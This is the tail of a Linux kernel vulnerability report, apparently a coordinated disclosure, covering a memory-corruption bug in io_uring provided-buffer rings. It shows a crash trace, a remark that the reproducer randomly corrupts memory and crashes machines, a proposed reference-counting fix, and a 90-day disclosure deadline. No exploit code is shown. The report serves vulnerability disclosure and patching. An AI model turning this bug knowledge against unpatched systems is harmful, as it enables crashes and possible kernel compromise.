0d 07 6f 0c 00 f7 d8 64 89 01 48<br />RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab<br />RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59<br />RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003<br />RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000<br />R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0<br />R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000<br /> </TASK><br />Modules linked in:<br />---[ end trace 0000000000000000 ]---<br />==============================================================<br /><br />When run on a system without those options, this reproducer will randomly<br />corrupt memory and probably on most runs crash the machine.<br />I tried it once and after I tried using some other programs, I got some random<br />kernel #GP fault.<br /><br /><br />One way to fix this might be to add some mapping counter to<br />`struct io_buffer_list`, and then:<br /><br /> - increment that counter in io_uring_validate_mmap_request() for PBUF_RING<br /> mappings<br /> - increment that counter in the vm_area_operations ->open() handler<br /> - decrement that counter in the vm_area_operations ->close() handler<br /> - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?<br /><br />Or alternatively free the io_buffer_list when the counter drops to zero, and let<br />the counter start at 1.<br /><br />(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's<br />memory are - it looks like most paths only access the io_buffer_list under some<br />lock? Is the idea that the kernel actually accesses the buffer through userspace<br />pointers, or something like that? I'll have to stare at this some more before I<br />understand it...)<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-02-26.<br /><br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>